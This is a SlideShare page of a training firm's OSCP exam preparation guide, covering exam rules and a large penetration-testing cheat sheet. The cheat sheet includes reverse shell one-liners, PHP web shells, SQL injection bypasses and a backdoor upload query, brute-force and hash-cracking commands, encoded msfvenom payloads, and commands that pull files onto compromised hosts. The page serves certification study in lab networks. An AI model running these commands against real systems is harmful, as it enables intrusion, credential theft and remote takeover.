SlideShare une entreprise Scribd logo

OSCP Preparation Guide @ Infosectrain

I
InfosecTrain

The Offensive Security Certified Professional (OSCP) is one of the most technical and most challenging certifications for information security professionals. For More information please contact us : https://www.infosectrain.com/

Formation
1  sur  22
Télécharger pour lire hors ligne
OSCPPreparation Guide Phone : +91-97736-67874 Email : sales@infosectrain.com Web : www.infosectrain.com
https://www.infosectrain.com/ Page 1 OSCP Preparation Guide  What is the offensive Security Certified Professional (OSCP)  Course Prerequisites  Overview of the Course  Lab Environment  Exam  Exam Preparation  Tips when you are taking the OSCP Exam  Resources and Websites recommended.
https://www.infosectrain.com/ Page 2 What is OSCP ? The Offensive Security Certified In order to become certified Professional is one of the most you must complete the technical and most challenging Penetration Testing with certifications for information Kali Linux (PwK) course security professionals and pass a “24 hour” hands-on exam and you have 24 hours to write a report. Information Security Professionals who pass the exam and have obtained their OSCP can research the network (information gathering), identify any vulnerabilities, and successfully execute attacks.
https://www.infosectrain.com/ Page 3 Course Prerequisites Before you decide to register for the course you need to have some experience in the following areas: 1.TCP/IP Networking Fundamentals  TCP/IP addressing and Subnetting  Understanding how network Traffic is sent & received  Types of protocols and services running on them. 2.Programming Languages  Bash  Python  Perl  Ruby 3. Operating Systems Knowledge  Linux (x86, 64-bit)  Windows (x86, 64-bit) 4.Note Taking Documentation is an important key when you are going through this course! Note Taking Tools:  Cherry Tree
https://www.infosectrain.com/ Page 4  Microsoft OneNote  KeepNote Overview of course  Passive Information Gathering  Active Information Gathering  Vulnerability Scanning  Buffer Overflow  Win32 Buffer Overflow Exploitation  Linux Buffer Overflow Exploitation  Working with Exploits  Privilege Escalation  File Transfers  Client-Side Attacks  Web Application Attacks  Password Attacks  Port Redirection and Tunneling  The Metasploit Framework  Bypassing Antivirus Software Detailed Course Syllabus: https://www.offensive- security.com/documentation/penetration-testing-with-kali.pdf
https://www.infosectrain.com/ Page 5 Lab Environment  You will be provided a VPN connection pack to access the lab.  The lab is broken into four networks: • Student Labs (Public Network) • IT Department • Development Network • Administrative Network
https://www.infosectrain.com/ Page 6 Recommended Lab Setup  VMware Workstation or VMware Player  Recommended Virtual Machines:  Kali Linux  If you want to play with the custom image that is made for the course, you can find it here: https://images.offensive- security.com/pwk-kali-vm.7z  Windows 7 32bit/64bit  Software: Immunity Debugger for Windows 32bit/64bit Tips when you are inside PWK network  Enumerate Enumerate Enumerate!  Understand the purpose of the system  Document EVERYTHING!  Track your hours  Do NOT skip the lab exercises  Use the reverts
https://www.infosectrain.com/ Page 7 The exam  23 hours and 45 minsYou will have a total of for the exam.  proctoredYou will be during your exam. Webcam and screen sharing software are required.  5 target systemsThe exam will consist of that are vulnerable and can be compromised. You will need a minimum of 70 points or higher to pass.  If you believe you have enough points you will have another 24 hours to write your report.  An extra 5 points will be given if you are able to complete the lab report and the course exercises
https://www.infosectrain.com/ Page 8 Exam Restrictions You cannot use any of the following on the exam:  Spoofing (IP, ARP, DNS, NBNS, etc)  Commercial tools or services (Metasploit Pro, Burp Pro, etc.)  Automatic exploitation tools (e.g, browser_autopwn, SQLmap, SQLninja, jsql etc.)  Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)
https://www.infosectrain.com/ Page 9 Preparing for the Exam When you feel that you are comfortable to take the exam, schedule it three to four weeks in advance Once you book a time slot to take your exam you should start thinking about the following:  Complete the lab report and class exercises to get the extra 5 points.  Read the guideline requirements before you take your exam.  Have an area or space that you will not be distracted in when you take your exam.  Do not forget to eat and drink.  Prepare your cheat sheets, notes, tools, and exploits.  Make sure you have your system set up and ready for the exam. SNAPSHOTS!  Start working on your exam report. Have a draft ready.
https://www.infosectrain.com/ Page 10 Hands on machines to Prepare for OSCP OSCP-Like VMs on Vulnhub and Hackthebox: http://tiny.cc/OSCP_PREP Prepare for OSCP on HTB with IppSec: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Resources to Prepare Enumeration Enumeration is the most important thing you can do, where you find yourself hitting a wall, 90% of the time it will be because you haven’t done enough enumeration. Below are commands which are helpful while you are in the lab: Nmap Quick TCP Scan nmap -sC -sV -vv -oA quick target
https://www.infosectrain.com/ Page 11 Quick UDP Scan nmap -sU -sV -vv -oA quick_udp target Full TCP Scan nmap -sC -sV -p- -vv -oA full target Port knock for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max- retries 0 -p $x target; done Web Scanning Gobuster quick directory busting gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux Gobuster search with file extension gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php Nikto web server scan nikto -h target Wordpress scan wpscan -u target/wp/ Port Checking
https://www.infosectrain.com/ Page 12 Netcat banner grab nc -v target port Telnet banner grab telnet target port SMB SMB Vulnerability Scan nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06- 025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln- ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse target SMB Users & Shares Scan nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse target Enum4linux enum4linux -a target Null connect rpcclient -U "" target Connect to SMB share smbclient //MOUNT/share SNMP SNMP enumeration snmp-check target Reverse Shells Bash shell
https://www.infosectrain.com/ Page 13 bash -i >& /dev/tcp/target/4443 0>&1 Netcat Linux nc -e /bin/sh target 4443 Netcat Windows nc -e cmd.exe target 4443 Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ STREAM);s.connect(("target",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","- i"]);' Perl perl -e 'use Socket;$i="target";$p=4443;socket(S,PF_INET,SOCK_STREAM,getproto byname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN ,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Remote Desktop Remote Desktop for windows with share and 85% screen rdesktop -u username -p password -g 85% -r disk:share=/root/ target PHP PHP command injection from GET Request <?php echo system($_GET["cmd"]);?> #Alternative <?php echo shell_exec($_GET["cmd"]);?> Powershell
https://www.infosectrain.com/ Page 14 Non-interactive execute powershell file powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -File file.ps1 SSH Tunneling / Pivoting shuttle sshuttle -vvr user@target 10.1.1.0/24 Local port forwarding ssh <gateway> -L <local port to listen>:<remote host>:<remote port> Remote port forwarding ssh <gateway> -R <remote port to bind>:<local host>:<local port> Dynamic port forwarding ssh -D <local proxy port> -p <remote port> <target> Plink local port forwarding plink -l root -pw pass -R 3389:<localhost>:3389 <remote host> SQL Injection # sqlmap crawl sqlmap -u http://target --crawl=1 # sqlmap dump database sqlmap -u http://target --dbms=mysql --dump # sqlmap shell sqlmap -u http://target --dbms=mysql --os-shell Upload php command injection file union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' Load file
https://www.infosectrain.com/ Page 15 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6 Bypasses ' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- - Brute force John the Ripper shadow file $ unshadow passwd shadow > unshadow.db $ john unshadow.db # Hashcat SHA512 $6$ shadow file hashcat -m 1800 -a 0 hash.txt rockyou.txt --username #Hashcat MD5 $1$ shadow file hashcat -m 500 -a 0 hash.txt rockyou.txt --username # Hashcat MD5 Apache webdav file hashcat -m 1600 -a 0 hash.txt rockyou.txt # Hashcat SHA1 hashcat -m 100 -a 0 hash.txt rockyou.txt --force # Hashcat Wordpress hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
https://www.infosectrain.com/ Page 16 RDP user with password list ncrack -vv --user offsec -P passwords rdp://target SSH user with password list hydra -l user -P pass.txt -t 10 target ssh -s 22 FTP user with password list medusa -h target -u user -P passwords.txt -M ftp MSFVenom Payloads # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=target LPORT=4443 -f raw -o shell.php # Java WAR reverse shell msfvenom -p java/shell_reverse_tcp LHOST=target LPORT=4443 -f war -o shell.war # Linux bind shell msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "x00x0ax0dx20" -e x86/shikata_ga_nai # Linux FreeBSD reverse shell msfvenom -p bsd/x64/shell_reverse_tcp LHOST=target LPORT=4443 - f elf -o shell.elf # Linux C reverse shell msfvenom -p linux/x86/shell_reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -f c # Windows non staged reverse shell
https://www.infosectrain.com/ Page 17 msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - e x86/shikata_ga_nai -f exe -o non_staged.exe # Windows Staged (Meterpreter) reverse shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe # Windows Python reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 EXITFUNC=thread -f python -o shell.py # Windows ASP reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - f asp -e x86/shikata_ga_nai -o shell.asp # Windows ASPX reverse shell msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx # Windows JavaScript reverse shell with nops msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - f js_le -e generic/none -n 18 # Windows Powershell reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 # Windows reverse shell excluding bad characters
https://www.infosectrain.com/ Page 18 msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=target LPORT=4443 EXITFUNC=thread -f c -b "x00x04" -e x86/shikata_ga_nai # Windows x64 bit reverse shell msfvenom -p windows/x64/shell_reverse_tcp LHOST=target LPORT=4443 -f exe -o shell.exe # Windows reverse shell embedded into plink msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows- binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe Interactive Shell Upgrading to a fully interactive TTY using Python # Enter while in reverse shell $ python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z # In Kali $ stty raw -echo $ fg # In reverse shell $ reset $ export SHELL=bash $ export TERM=xterm-256color $ stty rows <num> columns <cols>
https://www.infosectrain.com/ Page 19 File Transfers HTTP The most common file transfer method. # In Kali python -m SimpleHTTPServer 80 # In reverse shell - Linux wget target/file # In reverse shell - Windows powershell -c "(new-object System.Net.WebClient).DownloadFile('http://target/file.exe','C:Users userDesktopfile.exe')" FTP This process can be mundane, a quick tip would be to be to name the filename as ‘file’ on your kali machine so that you don’t have to re-write the script multiple names, you can then rename the file on windows. # In Kali python -m pyftpdlib -p 21 -w # In reverse shell echo open target > ftp.txt echo USER anonymous >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET file >> ftp.txt echo bye >> ftp.txt
https://www.infosectrain.com/ Page 20 # Execute ftp -v -n -s:ftp.txt TFTP Generic. # In Kali atftpd --daemon --port 69 /tftp # In reverse shell tftp -i target GET nc.exe
https://www.infosectrain.com/ Page 21 Privilege Escalation: g0tmi1k Linux Priv Esc fuzzysecurity Windows Priv Esc sploitspren Windows Priv Esc togie6 Windows Priv Esc Guide Kernel Exploits: abatchy17’s Windows Exploits lucyoa’s kernel exploits Buffer Overflows: CorleanSeries: Part 1: https://www.corelan.be/index.php/2009/07/19/exploit-writing- tutorial-part-1-stack-based-overflows/ Part 2: https://www.corelan.be/index.php/2009/07/23/writing-buffer- overflow-exploits-a-quick-and-basic-tutorial-part-2/ Scripts: LinuxPrivChecker LinEnum PowerUp

Recommandé

Oscp preparation
Oscp preparationOscp preparation
Oscp preparationManich Koomsusi
 
Oscp - Journey
Oscp - JourneyOscp - Journey
Oscp - JourneyVandana Verma
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - BeginnersHimanshu Kumar Das
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 

Recommandé

Oscp preparation
Oscp preparationOscp preparation
Oscp preparationManich Koomsusi
 
Oscp - Journey
Oscp - JourneyOscp - Journey
Oscp - JourneyVandana Verma
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - BeginnersHimanshu Kumar Das
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Threat Hunting Workshop
Threat Hunting WorkshopThreat Hunting Workshop
Threat Hunting WorkshopSplunk
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA RulesLionel Faleiro
 
Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Jason Williams
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsitmind4u
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teamingn|u - The Open Security Community
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
CISSP 8 Domains.pdf
CISSP 8 Domains.pdfCISSP 8 Domains.pdf
CISSP 8 Domains.pdfdotco
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersInfosec
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Applicationedavid2685
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Linux Security Scanning with Lynis
Linux Security Scanning with LynisLinux Security Scanning with Lynis
Linux Security Scanning with LynisMichael Boelen
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Is Cyber Resilience Really That Difficult?
Is Cyber Resilience Really That Difficult?Is Cyber Resilience Really That Difficult?
Is Cyber Resilience Really That Difficult?John Gilligan
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
From OSINT to Phishing presentation
From OSINT to Phishing presentationFrom OSINT to Phishing presentation
From OSINT to Phishing presentationJesse Ratcliffe, OSCP
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniquesamiable_indian
 
HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERUtah Networxs Consultoria e Treinamento
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 

Contenu connexe

Tendances

Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Threat Hunting Workshop
Threat Hunting WorkshopThreat Hunting Workshop
Threat Hunting WorkshopSplunk
 
Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Jason Williams
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsitmind4u
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
CISSP 8 Domains.pdf
CISSP 8 Domains.pdfCISSP 8 Domains.pdf
CISSP 8 Domains.pdfdotco
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersInfosec
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Applicationedavid2685
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Linux Security Scanning with Lynis
Linux Security Scanning with LynisLinux Security Scanning with Lynis
Linux Security Scanning with LynisMichael Boelen
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Is Cyber Resilience Really That Difficult?
Is Cyber Resilience Really That Difficult?Is Cyber Resilience Really That Difficult?
Is Cyber Resilience Really That Difficult?John Gilligan
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniquesamiable_indian
 

Tendances (20)

Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
Threat Hunting Workshop
Threat Hunting WorkshopThreat Hunting Workshop
Threat Hunting Workshop
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
 
Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturity
 
CISSP 8 Domains.pdf
CISSP 8 Domains.pdfCISSP 8 Domains.pdf
CISSP 8 Domains.pdf
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Application
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
Linux Security Scanning with Lynis
Linux Security Scanning with LynisLinux Security Scanning with Lynis
Linux Security Scanning with Lynis
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
Is Cyber Resilience Really That Difficult?
Is Cyber Resilience Really That Difficult?Is Cyber Resilience Really That Difficult?
Is Cyber Resilience Really That Difficult?
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
 
From OSINT to Phishing presentation
From OSINT to Phishing presentationFrom OSINT to Phishing presentation
From OSINT to Phishing presentation
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
 

Similaire à OSCP Preparation Guide @ Infosectrain

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!Michael Man
 
AppSec California 2016 - Making Security Agile
AppSec California 2016 - Making Security AgileAppSec California 2016 - Making Security Agile
AppSec California 2016 - Making Security AgileOleg Gryb
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxC4Media
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
OpenSCAP Overview(security scanning for docker image and container)
OpenSCAP Overview(security scanning for docker image and container)OpenSCAP Overview(security scanning for docker image and container)
OpenSCAP Overview(security scanning for docker image and container)Jooho Lee
 
Boris Stoyanov - Troubleshooting the Virtual Router - Run and Get Diagnostics
Boris Stoyanov - Troubleshooting the Virtual Router - Run and Get DiagnosticsBoris Stoyanov - Troubleshooting the Virtual Router - Run and Get Diagnostics
Boris Stoyanov - Troubleshooting the Virtual Router - Run and Get DiagnosticsShapeBlue
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
php & performance
php & performance php & performance
php & performancesimon8410
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Continuous Delivery: The Next Frontier
Continuous Delivery: The Next FrontierContinuous Delivery: The Next Frontier
Continuous Delivery: The Next FrontierCarlos Sanchez
 
Is your python application secure? - PyCon Canada - 2015-11-07
Is your python application secure? - PyCon Canada - 2015-11-07Is your python application secure? - PyCon Canada - 2015-11-07
Is your python application secure? - PyCon Canada - 2015-11-07Frédéric Harper
 

Similaire à OSCP Preparation Guide @ Infosectrain (20)

HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVER
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!
 
AppSec California 2016 - Making Security Agile
AppSec California 2016 - Making Security AgileAppSec California 2016 - Making Security Agile
AppSec California 2016 - Making Security Agile
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
OpenSCAP Overview(security scanning for docker image and container)
OpenSCAP Overview(security scanning for docker image and container)OpenSCAP Overview(security scanning for docker image and container)
OpenSCAP Overview(security scanning for docker image and container)
 
Nikto
NiktoNikto
Nikto
 
Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014
 
Boris Stoyanov - Troubleshooting the Virtual Router - Run and Get Diagnostics
Boris Stoyanov - Troubleshooting the Virtual Router - Run and Get DiagnosticsBoris Stoyanov - Troubleshooting the Virtual Router - Run and Get Diagnostics
Boris Stoyanov - Troubleshooting the Virtual Router - Run and Get Diagnostics
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
php & performance
php & performance php & performance
php & performance
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Continuous Delivery: The Next Frontier
Continuous Delivery: The Next FrontierContinuous Delivery: The Next Frontier
Continuous Delivery: The Next Frontier
 
Is your python application secure? - PyCon Canada - 2015-11-07
Is your python application secure? - PyCon Canada - 2015-11-07Is your python application secure? - PyCon Canada - 2015-11-07
Is your python application secure? - PyCon Canada - 2015-11-07
 

Plus de InfosecTrain

Csa certification training
Csa certification trainingCsa certification training
Csa certification trainingInfosecTrain
 
Csa certification training
Csa certification trainingCsa certification training
